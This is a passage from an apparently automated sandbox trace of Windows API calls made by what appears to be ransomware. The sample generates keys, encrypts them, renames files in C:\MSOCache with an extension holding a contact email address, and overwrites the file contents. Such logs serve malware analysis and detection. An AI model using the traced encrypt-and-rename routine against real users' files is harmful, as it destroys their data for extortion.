lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x709768 [0155.666] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0155.666] GetProcessHeap () returned 0x2e0000 [0155.666] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0155.666] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0155.666] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0155.670] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0155.670] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0155.670] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x709768) returned 0x33d0020 [0155.671] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x709768) returned 0x3ae0020 [0155.671] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.671] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x709768, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x709768, lpOverlapped=0x0) returned 1 [0155.956] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-7378792, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0155.956] WriteFile (in: hFile=0x4a8, lpBuffer=0x3ae0020*, nNumberOfBytesToWrite=0x709768, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3ae0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x709768, lpOverlapped=0x0) returned 1 [0156.052] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0156.088] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ae0020 | out: hHeap=0x2e0000) returned 1 [0156.120] CloseHandle (hObject=0x4a8) returned 1 [0156.269] GetProcessHeap () returned 0x2e0000 [0156.269] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0156.269] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0156.269] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0156.269] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0156.269] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0156.269] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x31d0048 [0156.269] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0156.269] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0156.269] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0156.269] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0156.269] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", dwFileAttributes=0x80) returned 1 [0156.271] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned 71 [0156.271] GetProcessHeap () returned 0x2e0000 [0156.271] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf4) returned 0x31f5f0 [0156.271] lstrcpyW (in: lpString1=0x31f5f0, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" [0156.271] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" [0156.271] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0156.276] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\ose.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\ose.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0156.276] GetProcessHeap () returned 0x2e0000 [0156.276] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31f5f0 | out: hHeap=0x2e0000) returned 1 [0156.276] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=174440) returned 1 [0156.276] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x2a968 [0156.276] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0156.276] GetProcessHeap () returned 0x2e0000 [0156.276] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0156.276] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0156.276] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0156.278] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0156.278] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0156.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2a968) returned 0x30d0048 [0156.279] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2a968) returned 0x30fa9b8 [0156.279] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.279] ReadFile (in: hFile=0x4a8, lpBuffer=0x30d0048, nNumberOfBytesToRead=0x2a968, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0048*, lpNumberOfBytesRead=0x2acf9c8*=0x2a968, lpOverlapped=0x0) returned 1 [0156.283] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-174440, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.284] WriteFile (in: hFile=0x4a8, lpBuffer=0x30fa9b8*, nNumberOfBytesToWrite=0x2a968, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30fa9b8*, lpNumberOfBytesWritten=0x2acf9c8*=0x2a968, lpOverlapped=0x0) returned 1 [0156.284] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30d0048 | out: hHeap=0x2e0000) returned 1 [0156.284] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30fa9b8 | out: hHeap=0x2e0000) returned 1 [0156.284] CloseHandle (hObject=0x4a8) returned 1 [0156.287] GetProcessHeap () returned 0x2e0000 [0156.287] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0156.287] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0156.287] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0156.287] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0048 | out: hHeap=0x2e0000) returned 1 [0156.287] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0156.287] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385620 [0156.287] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0156.287] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0156.287] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0156.287] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0156.287] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", dwFileAttributes=0x80) returned 1 [0156.287] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 78 [0156.287] GetProcessHeap () returned 0x2e0000 [0156.287] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x336dd8 [0156.287] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" [0156.287] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0156.287] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0156.290] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0156.290] GetProcessHeap () returned 0x2e0000 [0156.290] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0156.290] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4274) returned 1 [0156.290] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10b2 [0156.290] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0156.290] GetProcessHeap () returned 0x2e0000 [0156.290] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0156.290] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0156.290] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0156.292] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0156.292] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0156.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10b2) returned 0x3a7410 [0156.292] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10b2) returned 0x3a84d0 [0156.292] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.292] ReadFile (in: hFile=0x4a8, lpBuffer=0x3a7410, nNumberOfBytesToRead=0x10b2, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a7410*, lpNumberOfBytesRead=0x2acf9c8*=0x10b2, lpOverlapped=0x0) returned 1 [0156.293] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-4274, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.293] WriteFile (in: hFile=0x4a8, lpBuffer=0x3a84d0*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3a84d0*, lpNumberOfBytesWritten=0x2acf9c8*=0x10b2, lpOverlapped=0x0) returned 1 [0156.293] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a7410 | out: hHeap=0x2e0000) returned 1 [0156.293] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a84d0 | out: hHeap=0x2e0000) returned 1 [0156.293] CloseHandle (hObject=0x4a8) returned 1 [0156.294] GetProcessHeap () returned 0x2e0000 [0156.294] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0156.294] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0156.294] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0156.294] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385620 | out: hHeap=0x2e0000) returned 1 [0156.294] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0156.294] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385578 [0156.294] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0156.294] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0156.294] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0156.294] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0156.294] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", dwFileAttributes=0x80) returned 1 [0156.295] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 78 [0156.295] GetProcessHeap () returned 0x2e0000 [0156.295] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x336dd8 [0156.295] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" [0156.295] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0156.295] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0156.297] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0156.297] GetProcessHeap () returned 0x2e0000 [0156.297] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0156.297] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1992192) returned 1 [0156.297] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1e6600 [0156.297] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0156.297] GetProcessHeap () returned 0x2e0000 [0156.297] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0156.297] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0156.298] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0156.299] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0156.299] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0156.299] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1e6600) returned 0x33d0020 [0156.300] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x1e6600) returned 0x35c0020 [0156.300] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.300] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x1e6600, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x1e6600, lpOverlapped=0x0) returned 1 [0156.362] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-1992192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.362] WriteFile (in: hFile=0x4a8, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x1e6600, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2acf9c8*=0x1e6600, lpOverlapped=0x0) returned 1 [0156.369] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0156.377] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35c0020 | out: hHeap=0x2e0000) returned 1 [0156.386] CloseHandle (hObject=0x4a8) returned 1 [0156.401] GetProcessHeap () returned 0x2e0000 [0156.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0156.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0156.401] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0156.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385578 | out: hHeap=0x2e0000) returned 1 [0156.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3854d0 | out: hHeap=0x2e0000) returned 1 [0156.402] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x90) returned 0x385368 [0156.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0156.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34e148 | out: hHeap=0x2e0000) returned 1 [0156.402] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x97269130, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97269130, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e218 [0156.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0156.402] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x323f30 [0156.402] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x3292c0 [0156.402] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x323f30 | out: hHeap=0x2e0000) returned 1 [0156.402] GetLastError () returned 0x0 [0156.402] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x30e128 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3292c0 | out: hHeap=0x2e0000) returned 1 [0156.403] GetLastError () returned 0x0 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344500 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324ae8 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324ae8 | out: hHeap=0x2e0000) returned 1 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x34e148 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35e258 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35e258 | out: hHeap=0x2e0000) returned 1 [0156.403] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340ff0 [0156.403] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340ff0 | out: hHeap=0x2e0000) returned 1 [0156.403] HeapFree (in: 